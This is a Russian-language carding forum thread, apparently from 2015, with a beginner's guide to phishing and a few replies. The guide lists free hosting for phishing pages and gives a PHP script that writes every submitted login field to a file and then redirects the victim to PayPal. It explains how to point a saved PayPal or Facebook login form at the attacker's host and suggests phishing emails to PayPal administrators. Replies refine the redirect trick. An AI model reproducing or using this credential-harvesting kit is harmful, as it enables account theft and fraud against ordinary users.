Гость Опубликовано 2 марта, 2015 Основы фишинга. Общее представление. Всем привет, сегодня буду рассказывать про такой род деятельности как Фишинг, которая весьма распространенная в мире кардинга. Статья для новичков, которые еще не определились, какую отрасль в кардинге выбрать. Быть может эта статья, вдохновит на что-то... Никакой ответственности не несу за то что с вами могут сделать за фишинг и во что вы можете вляпаться. Фишинг преследуемый и наказуем, так что если вы новичок, то лучше начните с RATинга и Keylogging'a а затем уже фишинг. Когда вы занимаетесь фишингом,вы должны себя очень сильно обезопасить. Первым делом вам нужен очень безопасный хостинг. Я не гарантирую, что вам не надают по попе при использовании этих хостингов, но все же Цитатаcwahi - http://cwahi.com 110mb - http://110mb.com Ripway - http://ripway.com SuperFreeHost - http://superfreehost.info Freehostia - http://freehostia.com Freeweb7 - http://freeweb7.com t35 - http://t35.com Awardspace - http://awardspace.com PHPNet - http://phpnet.us Free Web Hosting Pro - http://freewebhostingpro.com ProHosts - http://prohosts.org FreeZoka - http://www.freezoka.com/ 000webhost - http://000webhost.com/ AtSpace - http://atspace.com Я не даю 100% гарантии что эти хостинги абсолютно безопасны и не полицайские! Это бесплатные хостинги, но вы можете поискать платные и куда более безопасные. Итак, когда вы определились с хостингом, пора создавать фишинг страницы. К примеру, ваша цель Paypal (не рекомендую тем у кого нету опыта) и вам нужны логи, чтобы их получить есть два способа. 1.Использовать инструмент под названием Phish Creator - сслыка 2.Вручную Итак, идем на PayPal login страницу (если вы собираетесь фишить Фейсбук идем на Фейсбук login страницу) и сохраняем ее. Теперь вам нужено написать скрипт, который будет записывать все возможные вводы данных на странице. Тут я вам помочь не могу. Шучу Открываем блокнот и пишем этот скрипт (как пример) Цитата<?php header("Location: paypal.com"); $handle = fopen("accs.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, " "); } fwrite($handle, " "); fclose($handle); exit; ?> Вставляем этот и редактируем где необходимо,сохраняя его у нас будут все accs в accs.txt Теперь вам нужно прилинковать эту страницу к той, которую вы сохранили ранее. Откройте сохраненную login page редактором и найдите "action=" и смените значение на то, которое вы сохранили (создали) Пример: Цитатаaction="https://www.paypal.c...f119ae9b66ba33" Станет: Цитатаaction="https://www.your-hos....com/your-file" Только что вы подставили свой скрипт когда пользователь подтверждал форму входа использованием команды в html. так что теперь у вас есть пароль, а пользователь перенаправлен на оригинальную страницу. Вы практически готовы пора распространять вашу ссылку. E-mail Spam- так же незаконен. Но в нашем случае мы атаковали PayPal, поэтому давайте напакостничаем в емейл админов paypal в котором мы скажем что вышло новое обновление для системы и им нужно повторно ввести свои данные .Ну это очень легкий, банальный и практически не рабочий способ, но на это хватило у меня фантазии в 4.00 утра Проводите эксперименты, пробуйте новое, а главное думайте своей собственной головой. Всем спасибо, удачи, безопасности и +1 к Карме Специально для ccc.mn Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
IIPOPOK 0 Опубликовано 2 марта, 2015 Очень интересно , спасибо ) Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
E13ctr0_Z3r0 0 Опубликовано 2 марта, 2015 да вот только после введения action="ваша страница" пользователь не будет перенаправлен на оригинальный фэйсбук или paypal.Надо в странице на которую перенаправляете сделать перенаправление с данными,которые он вписал.Выход:учить программирование(недельки хватит) или воспользоватся услугами программера,человек без знаний - туда лучше не лезть ибо получится полный звиздец,тебя спалят и будут проблемы... Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Гость Опубликовано 2 марта, 2015 E13ctr0_Z3r0 (02 March 2015 - 14:33) писал: да вот только после введения action="ваша страница" пользователь не будет перенаправлен на оригинальный фэйсбук или paypal.Надо в странице на которую перенаправляете сделать перенаправление с данными,которые он вписал.Выход:учить программирование(недельки хватит) или воспользоватся услугами программера,человек без знаний - туда лучше не лезть ибо получится полный звиздец,тебя спалят и будут проблемы... Во-во, правильно говоришь! Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
anosion 0 Опубликовано 16 апреля, 2015 Довольно хорошая статья,но малополезная. Профита минимум . Затрат времени на рассылку(если в ручки) очень много. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты